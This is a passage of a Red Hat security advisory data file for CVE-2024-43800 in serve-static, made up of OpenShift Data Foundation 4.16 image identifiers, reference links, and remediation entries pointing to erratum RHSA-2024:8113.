"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", 